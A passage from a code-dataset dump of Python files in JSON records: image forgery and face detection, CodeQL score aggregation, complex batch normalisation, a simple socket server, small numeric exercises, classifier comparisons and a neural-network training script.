np.delete(des,l,axis=0)\n\t\t\t\t#print('k :',len(kp),'...',len(ds))\n\t\t\t\tnn_matches = matcher.knnMatch(np.array(ds_1), ds_2, 2)\n\t\t\t\t#print(nn_matches)\n\t\t\t\tmatched1 = []\n\t\t\t\tmatched2 = []\n\t\t\t\tnn_match_ratio = 0.43 # Nearest neighbor matching ratio\n\t\t\t\tfor m, n in nn_matches:\n\t\t\t\t\tif m.distance < nn_match_ratio * n.distance:\n\t\t\t\t\t\tmatched1.append(kp_1[m.queryIdx])\n\t\t\t\t\t\tmatched2.append(kp_2[m.trainIdx])\n\t\t\t\t\tif len(matched1)>=4 :\n\t\t\t\t\t\tflag = 1\n\t\t\t\t\t\tfor k1,k2 in zip(matched1,matched2):\n\t\t\t\t\t\t\t\tcv2.line(clone1,(int(k1.pt[0]),int(k1.pt[1])),(int(k2.pt[0]),int(k2.pt[1])),(50,200,50),2)\n \n\t\t\n\t\tif flag == 1:\n\t\t\treturn (\"fake\")\n\t\tflag = 0\n\t\t#cv2.imshow('image',clone1)\n \n\t\tend_time = datetime.now()\n\t\tprint('Duration: {}'.format(end_time - start_time))\n\t\ti += 1\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()","sub_path":"backend/app/server/controllers/forgery_detect.py","file_name":"forgery_detect.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449971716","text":"import glob\nimport argparse\nimport logging\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\n\n\ndef combine_scores(query, \\\n project_dir=os.path.dirname(os.path.dirname(os.path.realpath(__file__)))):\n \n files=glob.glob(os.path.join(project_dir,\"results\")+\"/*/{0}-*/reprScores.txt\".format(query))\n print(files)\n\n files.sort(key=os.path.getmtime)\n n=0\n allreps=[]\n src_dict = dict()\n snk_dict = dict()\n san_dict = dict()\n file_src_reprs = dict()\n file_snk_reprs = dict()\n file_san_reprs = dict()\n for reprScoreFile in files:\n if r'results\\combined' not in reprScoreFile:\n print(reprScoreFile)\n file_src_reprs[reprScoreFile] = []\n file_snk_reprs[reprScoreFile] = []\n file_san_reprs[reprScoreFile] = []\n n+=1\n for reprScopeLine in open(reprScoreFile).readlines():\n repr=re.findall(\"repr = \\\"([^\\\"]+)\\\"\", reprScopeLine)[0]\n t=re.findall(\"t = \\\"([^\\\"]+)\\\"\", reprScopeLine)[0]\n res=float(re.findall(\"result = ([0-9.]+)\", reprScopeLine)[0])\n #print(l.strip())\n #print(repr, t, res)\n if t == \"src\":\n src_dict[repr] = src_dict.get(repr, []) + [res]\n file_src_reprs[reprScoreFile] = file_src_reprs.get(reprScoreFile, []) + [repr]\n if t == \"snk\":\n snk_dict[repr] = snk_dict.get(repr, []) + [res]\n file_snk_reprs[reprScoreFile] = file_snk_reprs.get(reprScoreFile, []) + [repr]\n if t == \"san\":\n san_dict[repr] = san_dict.get(repr, []) + [res]\n file_san_reprs[reprScoreFile] = file_san_reprs.get(reprScoreFile, []) + [repr]\n\n\n print(n)\n\n\n print(len(src_dict), len(snk_dict), len(san_dict))\n with open(\"allscores_{0}_avg.txt\".format(query), \"w\") as scoresfile:\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"src\", np.mean(src_dict[k])) for k in src_dict.keys()]))\n scoresfile.write(\"\\nor\\n\")\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"snk\", np.mean(snk_dict[k])) for k in snk_dict.keys()]))\n scoresfile.write(\"\\nor\\n\")\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"san\", np.mean(san_dict[k])) for k in san_dict.keys()]))\n\n\n\n\n\nparser = argparse.ArgumentParser()\nlogging.basicConfig(level=logging.INFO, format=\"[%(levelname)s\\t%(asctime)s] 
%(name)s\\t%(message)s\")\n\n\n#parser.add_argument(\"--project-dir\", dest=\"project_dir\", required=True, type=str,\n# help=\"Directory of the CodeQL database\")\nparser.add_argument(\"--query-name\", dest=\"query_name\", required=True, type=str,\n choices=[\"NosqlInjectionWorse\", \"SqlInjectionWorse\", \"DomBasedXssWorse\"],\n help=\"Name of the query to solve\")\n\nparsed_arguments = parser.parse_args()\n#project_dir = os.path.normpath(parsed_arguments.project_dir)\n#project_name = os.path.basename(project_dir)\n#query = os.environ[\"QUERY_NAME\"]\nquery_name = parsed_arguments.query_name\n\nif __name__ == '__main__':\n combine_scores(query_name)\n","sub_path":"constraintsolving/misc/combinescores.py","file_name":"combinescores.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"589478982","text":"import numpy as np\nimport torch.nn as nn\n\nfrom .polar_transforms import *\n\n\ndef unsqueeze_n(x, dims=[-1]):\n for i in dims:\n x = x.unsqueeze(i)\n return x\n\n\ndef magnitude(input):\n real, imag = torch.unbind(input, -1)\n return (real ** 2 + imag ** 2) ** 0.5\n\n\ndef complex_std(x):\n '''\n Standard deviation of real and imaginary channels\n STD = sqrt( E{(x-mu)(x-mu)*} ), where * is the complex conjugate,\n\n - Source: https://en.wikipedia.org/wiki/Variance#Generalizations\n '''\n mu = torch.mean(torch.mean(x, 2, True), 3, True)\n\n xm = torch.sum(((x - mu) ** 2), 2, True)\n return torch.mean(torch.mean(xm, 2, True), 3, True) ** (0.5)\n\n\ndef normalizeComplexBatch(x):\n ''' normalize real and imaginary channels'''\n return (x - torch.mean(torch.mean(x, 2, True), 3, True)) / complex_std(x)\n\n\ndef log_mag(x, polar=False):\n '''calculates the log of the magnitude in a complex tensor x'''\n if not polar:\n x = convert_cylindrical_to_polar(x)\n\n ndims = x.ndimension()\n mag, phase = torch.unbind(x, -1)\n x = torch.stack([torch.log(1 + mag), phase], dim=ndims - 1)\n\n if not polar:\n x = convert_polar_to_cylindrical(x)\n\n return x\n\n\ndef exp_mag(x, polar=False):\n '''calculates the exponential of the magnitude in a complex tensor x'''\n if not polar:\n x = convert_cylindrical_to_polar(x)\n\n ndims = x.ndimension()\n mag, phase = torch.unbind(x, -1)\n x = torch.stack([torch.exp(mag) - 1, phase], dim=ndims - 1)\n\n if not polar:\n x = convert_polar_to_cylindrical(x)\n\n return x\n\n\ndef normalize_complex_batch_by_magnitude_only(x, polar=False, normalize_over_channel=False):\n '''\n normalize the complex batch by making the magnitude of mean 1 and std 1, and keep the phase as it is\n :param:\n x: is the input tensor to be normalized\n polar: if x is in the polar form already (i.e. 
magnitude and phase)\n        normalize_over_channel: if the normalization will be performed over all channels\n    '''\n\n    shift_mean = 5\n    if not polar:\n        x = convert_cylindrical_to_polar(x)\n\n    mag, phase = torch.unbind(x, -1)\n    mdims = 1 if normalize_over_channel else 2\n\n    sqz_mdims = [-1] * (x.ndimension() - mdims)\n    dim_prod = np.prod(mag.shape[mdims:])\n\n    mag_s = mag.reshape((mag.shape[0], dim_prod))\n    norm_mag = (mag - unsqueeze_n(mag_s.mean(-1), sqz_mdims)) / unsqueeze_n(mag_s.std(-1), sqz_mdims) + shift_mean\n    x = torch.stack([norm_mag, phase], dim=x.ndimension() - 1)\n\n    if not polar:\n        x = convert_polar_to_cylindrical(x)\n    return x\n\n\nclass ComplexBatchNormalize(nn.Module):\n    def __init__(self):\n        super(ComplexBatchNormalize, self).__init__()\n\n    def forward(self, input):\n        return normalize_complex_batch_by_magnitude_only(input)\n","sub_path":"utils/cmplx_batchnorm.py","file_name":"cmplx_batchnorm.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"178975580","text":"import socket\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind((socket.gethostname(),1234))\ns.listen(5)\nwhile True:\n    clt,adr=s.accept()\n    print(f\"connection on {adr}\")\n    clt.send(bytes(\"Hello Sockets\",\"utf-8\"))\n    clt.close()\n\n    \n","sub_path":"python/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"493253011","text":"import torch\n\nfrom pipert.core.message import PredictionPayload\nfrom pipert.utils.structures import Instances, Boxes\nfrom pipert.core.component import BaseComponent\nfrom pipert.core.message import Message\nfrom queue import Queue, Empty, Full\nimport argparse\nfrom urllib.parse import urlparse\nimport zerorpc\nimport gevent\nimport signal\nimport time\nimport cv2\nfrom pipert.core.routine import Routine\nfrom pipert.core.mini_logics import Message2Redis, MessageFromRedis\nfrom pipert.core.routine import Events\nfrom pipert.core.handlers import tick, tock\nfrom pipert.contrib.metrics_collectors.prometheus_collector import PrometheusCollector\nfrom pipert.core.metrics_collector import NullCollector\nfrom pipert.contrib.metrics_collectors.splunk_collector import SplunkCollector\n\n\nclass FaceDetLogic(Routine):\n\n    def __init__(self, in_queue, out_queue, out_frame_queue, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.in_queue = in_queue\n        self.out_queue = out_queue\n        self.out_frame_queue = out_frame_queue\n        self.face_cas = None\n\n    def main_logic(self, *args, **kwargs):\n        try:\n            frame_msg = self.in_queue.get(block=False)\n            frame = frame_msg.get_payload()\n            if frame is not None:\n                gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n                faces = self.face_cas.detectMultiScale(\n                    gray,\n                    scaleFactor=1.1,\n                    minNeighbors=5,\n                    minSize=(20, 20)\n                )\n                if len(faces):\n                    faces = torch.from_numpy(faces)\n                    faces[:, 2:] += faces[:, :2]\n                    # print(faces.size(), faces)\n                    new_instances = Instances(frame.shape[:2])\n                    new_instances.set(\"pred_boxes\", Boxes(faces))\n                    new_instances.set(\"pred_classes\", torch.zeros(faces.size(0)).int())\n                else:\n                    new_instances = Instances(frame.shape[:2])\n                    new_instances.set(\"pred_classes\", [])\n\n                try:\n                    self.out_queue.get(block=False)\n                    self.state.dropped += 1\n                except Empty:\n                    pass\n\n                pred_msg = Message(new_instances, frame_msg.source_address)\n                try:\n                    self.out_frame_queue.put(frame_msg, block=False)\n                    self.out_queue.put(pred_msg, block=False)\n
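                # the queues hold a single item; Full here means the uploaders have not drained them yet\n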
                except Full:\n                    return False\n                return True\n            else:\n                time.sleep(0)\n                return False\n\n        except Empty:\n            time.sleep(0)\n            return False\n\n    def setup(self, *args, **kwargs):\n        casc_path = \"pipert/contrib/face_detect/haarcascade_frontalface_default.xml\"\n        self.face_cas = cv2.CascadeClassifier(casc_path)\n        self.state.dropped = 0\n\n    def cleanup(self, *args, **kwargs):\n        pass\n\n\nclass FaceDetComponent(BaseComponent):\n\n    def __init__(self, endpoint, in_key, out_key, out_frame_key, redis_url, metrics_collector, maxlen=100, name=\"FaceDetection\", use_memory=False):\n        super().__init__(endpoint, name, metrics_collector, use_memory=use_memory)\n        # TODO: should queue maxsize be configurable?\n        self.in_queue = Queue(maxsize=1)\n        self.out_queue = Queue(maxsize=1)\n        self.out_frame_queue = Queue(maxsize=1)\n\n        r_get = MessageFromRedis(in_key, redis_url, self.in_queue, name=\"get_from_redis\", component_name=self.name).as_thread()\n        r_sort = FaceDetLogic(self.in_queue, self.out_queue, self.out_frame_queue, name=\"face_det_logic\", component_name=self.name).as_thread()\n        r_upload_meta = Message2Redis(out_key, redis_url, self.out_queue, maxlen, name=\"upload_meta\", component_name=self.name).as_thread()\n        r_upload_frame = Message2Redis(out_frame_key, redis_url, self.out_frame_queue, maxlen, name=\"upload_frame\", component_name=self.name).as_thread()\n\n        routines = [r_get, r_sort, r_upload_meta, r_upload_frame]\n        for routine in routines:\n            # routine.register_events(Events.BEFORE_LOGIC, Events.AFTER_LOGIC)\n            # routine.add_event_handler(Events.BEFORE_LOGIC, tick)\n            # routine.add_event_handler(Events.AFTER_LOGIC, tock)\n            self.register_routine(routine)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-i', '--input', help='Input stream key name', type=str, default='camera:2')\n    parser.add_argument('-o', '--output', help='Output stream key name', type=str, default='camera:3')\n    parser.add_argument('-of', '--outputFrame', help='Output Frame stream key name', type=str, default='camera:4')\n    parser.add_argument('--monitoring', help='Name of the monitoring service', type=str, default='prometheus')\n    parser.add_argument('-s', '--shared', help='Shared memory', type=bool, default=False)\n    parser.add_argument('-u', '--url', help='Redis URL', type=str, default='redis://127.0.0.1:6379')\n    parser.add_argument('-z', '--zpc', help='zpc port', type=str, default='4248')\n    parser.add_argument('--maxlen', help='Maximum length of output stream', type=int, default=100)\n    # max_age: int = 1, min_hits: int = None, window_size: int = None, percent_seen\n    opt = parser.parse_args()\n\n    url = urlparse(opt.url)\n\n    if opt.monitoring == 'prometheus':\n        collector = PrometheusCollector(8081)\n    elif opt.monitoring == 'splunk':\n        collector = SplunkCollector()\n    else:\n        collector = NullCollector()\n\n    zpc = FaceDetComponent(f\"tcp://0.0.0.0:{opt.zpc}\", opt.input, opt.output, opt.outputFrame, url, metrics_collector=collector, maxlen=opt.maxlen,\n                           use_memory=opt.shared)\n    print(\"run\")\n    zpc.run()\n    print(\"Killed\")\n","sub_path":"pipert/contrib/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608638791","text":"import numpy as np\n\ndef f(x):\n    return 2 * np.cos(x) - x\n\ndef bisection(xm, xp, n_max, e):\n    for i in np.arange(n_max):\n        x = (xm + xp) / 2\n        print(\"i=\", i, \" x=\", x, \" f(x)=\", f(x))\n        if f(xp) * f(x) > 0:\n            xp = x\n
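        # f(x) and f(xp) now bracket the root, so move the lower bound up\n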
        else:\n            xm = x\n        if xp - xm < e:\n            print(\"\n root found with precision e=\", e)\n            break\n        if i == n_max - 1:\n            print(\"\n root not found after Nmax iterations \")\n    return x\n\ne = 1e-6\na = 0.0\nb = 7.0\nn_max = 100\nroot = bisection(a, b, n_max, e)\nprint(\"Root =\", root)\n","sub_path":"scripts/bisection.py","file_name":"bisection.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"166825929","text":"def verifica_progressao(lista):\n    razaoA = [0] * (len(lista) - 1)\n    razaoG = [0] * (len(lista) - 1)\n    PA = True\n    PG = True\n\n    # a constant sequence is both arithmetic and geometric\n    for e in range(1,len(lista)):\n        if lista[e] != lista[e-1]:\n            break\n    else:\n        return \"AG\"\n\n    for e in range(1,len(lista)):\n        razaoA[e - 1] = lista[e] - lista[e-1]\n    for e in range(0, len(razaoA)):\n        if razaoA[e] != razaoA[0]:\n            PA = False\n\n    for e in range(1,len(lista)):\n        razaoG[e-1] = lista[e] / lista[e-1]\n    for e in range(0, len(razaoG)):\n        if razaoG[e] != razaoG[0]:\n            PG = False\n\n    if PA and PG:\n        return 'AG'\n    elif PA:\n        return 'PA'\n    elif PG:\n        return 'PG'\n    else:\n        return 'NA'\n","sub_path":"backup/user_216/ch57_2020_09_28_13_04_50_237738.py","file_name":"ch57_2020_09_28_13_04_50_237738.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307137097","text":"class Queue:\n    def __init__(self):\n        self.e_s = []\n    def enQ(self,data):\n        self.e_s.append(data)\n    def dQ(self):\n        if len(self.e_s) == 1:\n            return self.e_s.pop()\n        item = self.e_s.pop()\n        dq_item = self.dQ()\n        self.e_s.append(item)\n        return dq_item\n\nQ = Queue()\n\nQ.enQ(10)\nQ.enQ(5)\nQ.enQ(20)\nprint(Q.dQ())\nQ.enQ(100)\nprint(Q.dQ())\nprint(Q.dQ())\nprint(Q.dQ())","sub_path":"test11.py","file_name":"test11.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180757462","text":"from DataForClassifier import getShoeFeatures,getShoeLabel,getShoeFeaturesTest,getShoeLabelTest\r\nfrom sklearn import tree\r\nfrom sklearn.ensemble import AdaBoostClassifier,RandomForestClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\nX = getShoeFeatures()\r\nY = getShoeLabel()\r\nX_Test = getShoeFeaturesTest()\r\nY_Test = getShoeLabelTest()\r\n\r\n#Decision Tree Classifier Prediction\r\nClf_tree = tree.DecisionTreeClassifier()\r\nClf_tree = Clf_tree.fit(X,Y)\r\npredictionClf_tree = Clf_tree.predict(X_Test)\r\nprint(\"Decision Tree Classifier:\",predictionClf_tree)\r\n\r\n#Ada Boost Classifier Prediction\r\nClf_AdaBoostClassifier = AdaBoostClassifier()\r\nClf_AdaBoostClassifier = Clf_AdaBoostClassifier.fit(X,Y)\r\npredictionClfAdaBoost = Clf_AdaBoostClassifier.predict(X_Test)\r\nprint(\"Ada Boost Classifier:\",predictionClfAdaBoost)\r\n\r\n#Random Forest Classifier Prediction\r\nClf_RandomForest = RandomForestClassifier()\r\nClf_RandomForest = Clf_RandomForest.fit(X,Y)\r\npredictionClfRandomForest = Clf_RandomForest.predict(X_Test)\r\nprint(\"Random Forest Classifier:\",predictionClfRandomForest)\r\n\r\n#Gaussian NB Classifier Prediction\r\nClf_GaussianNB = GaussianNB()\r\nClf_GaussianNB = Clf_GaussianNB.fit(X,Y)\r\npredictionClfGaussianNB = Clf_GaussianNB.predict(X_Test)\r\nprint(\"Gaussian NB Classifier:\",predictionClfGaussianNB)\r\n\r\n\r\n#KNeighbors Classifier Prediction\r\nClf_KNeighbors = 
KNeighborsClassifier()\r\nClf_KNeighbors = Clf_KNeighbors.fit(X,Y)\r\npredictionClfKNeighbors = Clf_KNeighbors.predict(X_Test)\r\nprint(\"K Neighbors Classifier:\",predictionClfKNeighbors)\r\n\r\n#Calculate accuracies of individual Classifiers\r\nAcc_DTree = accuracy_score(Y_Test,predictionClf_tree)\r\nAcc_AdaBoost = accuracy_score(Y_Test,predictionClfAdaBoost)\r\nAcc_RandomForest = accuracy_score(Y_Test,predictionClfRandomForest)\r\nAcc_GaussianNB = accuracy_score(Y_Test,predictionClfGaussianNB)\r\nAcc_KNeighbors = accuracy_score(Y_Test,predictionClfKNeighbors)\r\n\r\nprint(\"Decision Tree Accuracy: \", Acc_DTree)\r\nprint(\"Ada Boost Accuracy: \", Acc_AdaBoost)\r\nprint(\"Random Forest Accuracy: \", Acc_RandomForest)\r\nprint(\"GaussianNB Accuracy: \", Acc_GaussianNB)\r\nprint(\"KNeighbors Accuracy: \", Acc_KNeighbors)\r\n\r\n#Print the Maximum accuracy\r\nprint(\"Max Accuracy:\",max(Acc_DTree,Acc_KNeighbors,Acc_GaussianNB,Acc_RandomForest,Acc_AdaBoost))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PredictMFAccuracy.py","file_name":"PredictMFAccuracy.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217545480","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\n\nimport argparse\nimport os\nimport pprint\nimport shutil\nimport importlib\nimport time\nimport torch\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nfrom tensorboardX import SummaryWriter\n\nfrom torch.utils.data import DataLoader, ConcatDataset\nfrom datetime import datetime\n\nfrom config.common import _C as cfg\nfrom config.common import update_config\nfrom core.loss import HybridLoss\nfrom core.function import train\nfrom core.function import validate\nfrom utils.utils import get_optimizer\nfrom utils.utils import save_checkpoint\nfrom utils.utils import create_logger\n\nimport dataset\nimport models\n\n\ndef timer(start_time=None):\n if not start_time:\n return datetime.now()\n elif start_time:\n thour, temp_sec = divmod((datetime.now() - start_time).total_seconds(), 3600)\n tmin, tsec = divmod(temp_sec, 60)\n print('Time taken: %i hours %i minutes and %s seconds.\\n' % (thour, tmin, round(tsec, 2)))\n return datetime.now()\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train keypoints network')\n # general\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n\n parser.add_argument('opts',\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER)\n\n # philly\n parser.add_argument('--modelDir',\n help='model directory',\n type=str,\n default='')\n parser.add_argument('--logDir',\n help='log directory',\n type=str,\n default='')\n parser.add_argument('--dataDir',\n help='data directory',\n type=str,\n default='')\n parser.add_argument('--prevModelDir',\n help='prev Model directory',\n type=str,\n default='')\n\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n update_config(cfg, args)\n\n logger, final_output_dir, tb_log_dir = create_logger(\n cfg, args.cfg, 'train')\n\n logger.info(pprint.pformat(args))\n logger.info(cfg)\n\n # cudnn related setting\n cudnn.benchmark = cfg.CUDNN.BENCHMARK\n torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC\n 
torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED\n\n model_builder = importlib.import_module(\"models.\" + cfg.MODEL.NAME).get_fovea_net\n model = model_builder(cfg, is_train=True)\n\n # xiaofeng add for load parameter\n if cfg.TEST.MODEL_FILE:\n logger.info('=> loading model from {}'.format(cfg.TEST.MODEL_FILE))\n model.load_state_dict(torch.load(cfg.TEST.MODEL_FILE), strict=False)\n\n # copy model file -- xiaofeng comment it\n # this_dir = os.path.dirname(__file__)\n # shutil.copy2(os.path.join(this_dir, '../models', cfg.MODEL.NAME + '.py'), final_output_dir)\n\n writer_dict = {\n 'writer': SummaryWriter(log_dir=tb_log_dir),\n 'train_global_steps': 0,\n 'valid_global_steps': 0,\n }\n\n dump_input = torch.rand(\n (1, 3, cfg.MODEL.IMAGE_SIZE[1], cfg.MODEL.IMAGE_SIZE[0])\n )\n\n model = torch.nn.DataParallel(model, device_ids=cfg.GPUS).cuda()\n\n # define loss function (criterion) and optimizer\n criterion = HybridLoss(\n roi_weight=cfg.LOSS.ROI_WEIGHT,\n regress_weight=cfg.LOSS.REGRESS_WEIGHT,\n use_target_weight=cfg.LOSS.USE_TARGET_WEIGHT,\n hrnet_only=cfg.TRAIN.HRNET_ONLY).cuda()\n\n # Data loading code\n # normalize = transforms.Normalize(\n # mean=[0.134, 0.207, 0.330], std=[0.127, 0.160, 0.239]\n # )\n # train_dataset = importlib.import_module('dataset.'+cfg.DATASET.DATASET).Dataset(\n # cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET, True,\n # transforms.Compose([\n # transforms.ToTensor(),\n # normalize,\n # ])\n # )\n # valid_dataset = importlib.import_module('dataset.'+cfg.DATASET.DATASET).Dataset(\n # cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, False,\n # transforms.Compose([\n # transforms.ToTensor(),\n # normalize,\n # ])\n # )\n # \n # train_loader = torch.utils.data.DataLoader(\n # train_dataset,\n # batch_size=cfg.TRAIN.BATCH_SIZE_PER_GPU*len(cfg.GPUS),\n # shuffle=cfg.TRAIN.SHUFFLE,\n # num_workers=cfg.WORKERS,\n # pin_memory=cfg.PIN_MEMORY\n # )\n # valid_loader = torch.utils.data.DataLoader(\n # valid_dataset,\n # batch_size=cfg.TEST.BATCH_SIZE_PER_GPU*len(cfg.GPUS),\n # shuffle=False,\n # num_workers=cfg.WORKERS,\n # pin_memory=cfg.PIN_MEMORY\n # )\n\n db_trains = []\n db_vals = []\n final_full_test = cfg.TRAIN.FULL_DATA\n normalize_1 = transforms.Normalize(\n mean=[0.282, 0.168, 0.084], std=[0.189, 0.110, 0.062]\n )\n train_dataset_1 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_1, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_1,\n ])\n )\n db_trains.append(train_dataset_1)\n\n normalize_2 = transforms.Normalize(\n mean = [0.409, 0.270, 0.215], std = [0.288, 0.203, 0.160]\n )\n train_dataset_2 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_2, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_2,\n ])\n )\n db_trains.append(train_dataset_2)\n\n if final_full_test is True:\n normalize_3 = transforms.Normalize(\n mean = [0.404, 0.271, 0.222], std = [0.284, 0.202, 0.163]\n )\n train_dataset_3 = importlib.import_module('dataset.' 
+ cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_3,\n ])\n )\n db_trains.append(train_dataset_3)\n\n train_dataset = ConcatDataset(db_trains)\n logger.info(\"Combined Dataset: Total {} images\".format(len(train_dataset)))\n\n train_batch_size = cfg.TRAIN.BATCH_SIZE_PER_GPU * len(cfg.GPUS)\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=train_batch_size,\n shuffle=cfg.TRAIN.SHUFFLE,\n num_workers=cfg.WORKERS,\n pin_memory=cfg.PIN_MEMORY\n )\n\n normalize = transforms.Normalize(\n mean=[0.404, 0.271, 0.222], std=[0.284, 0.202, 0.163]\n )\n val_dataset_1 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n )\n db_vals.append(val_dataset_1)\n\n if final_full_test is True:\n normalize_1 = transforms.Normalize(\n mean=[0.282, 0.168, 0.084], std=[0.189, 0.110, 0.062]\n )\n val_dataset_2 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_1, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_1,\n ])\n )\n db_vals.append(val_dataset_2)\n\n normalize_2 = transforms.Normalize(\n mean=[0.409, 0.270, 0.215], std=[0.288, 0.203, 0.160]\n )\n val_dataset_3 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_2, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_2,\n ])\n )\n db_vals.append(val_dataset_3)\n\n valid_dataset = ConcatDataset(db_vals)\n\n logger.info(\"Val Dataset: Total {} images\".format(len(valid_dataset)))\n\n test_batch_size = cfg.TEST.BATCH_SIZE_PER_GPU * len(cfg.GPUS)\n valid_loader = torch.utils.data.DataLoader(\n valid_dataset,\n batch_size=cfg.TEST.BATCH_SIZE_PER_GPU * len(cfg.GPUS),\n shuffle=False,\n num_workers=cfg.WORKERS,\n pin_memory=cfg.PIN_MEMORY\n )\n\n logger.info(\"Train len: {}, batch_size: {}; Test len: {}, batch_size: {}\" \\\n .format(len(train_loader), train_batch_size, len(valid_loader), test_batch_size))\n\n best_metric = 1e6\n best_model = False\n last_epoch = -1\n optimizer = get_optimizer(cfg, model)\n begin_epoch = cfg.TRAIN.BEGIN_EPOCH\n\n if cfg.TEST.MODEL_FILE:\n checkpoint_file = cfg.TEST.MODEL_FILE\n else:\n checkpoint_file = os.path.join(final_output_dir, 'checkpoint.pth')\n\n if cfg.AUTO_RESUME and os.path.exists(checkpoint_file):\n logger.info(\"=> loading checkpoint '{}'\".format(checkpoint_file))\n checkpoint = torch.load(checkpoint_file)\n # begin_epoch = checkpoint['epoch']\n begin_epoch = 0 # xiaofeng change it\n best_metric = checkpoint['metric']\n last_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(\n checkpoint_file, checkpoint['epoch']))\n\n if cfg.TRAIN.LR_EXP:\n # llr=lr∗gamma∗∗epoch\n lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, cfg.TRAIN.GAMMA1, last_epoch=-1)\n else:\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, cfg.TRAIN.LR_STEP, cfg.TRAIN.LR_FACTOR,\n last_epoch=last_epoch\n )\n\n for epoch in range(begin_epoch, cfg.TRAIN.END_EPOCH):\n start_time = timer()\n\n lr_scheduler.step()\n\n # evaluate on validation set\n # lr_metric, hr_metric, final_metric = validate(\n # cfg, valid_loader, valid_dataset, model, criterion,\n # final_output_dir, 
tb_log_dir, writer_dict, db_vals\n # )\n # print(\"validation before training spent time:\")\n # timer(start_time) # timing ends here for \"start_time\" variable\n\n # train for one epoch\n train(cfg, train_loader, model, criterion, optimizer, epoch,\n final_output_dir, tb_log_dir, writer_dict)\n\n print(\"epoch %d train spent time:\" % (epoch))\n train_time = timer(start_time) # timing ends here for \"start_time\" variable\n\n # if epoch >= int(cfg.TRAIN.END_EPOCH/10):\n # evaluate on validation set\n lr_metric, hr_metric, final_metric = validate(\n cfg, valid_loader, valid_dataset, model, criterion,\n final_output_dir, tb_log_dir, writer_dict, db_vals\n )\n\n print(\"validation spent time:\")\n val_time = timer(train_time) # timing ends here for \"start_time\" variable\n\n min_metric = min(lr_metric, hr_metric, final_metric)\n if min_metric <= best_metric:\n best_metric = min_metric\n best_model = True\n logger.info('=> epoch [{}] best model result: {}'.format(epoch, best_metric))\n else:\n best_model = False\n\n # xiaofeng changed it\n if best_model is 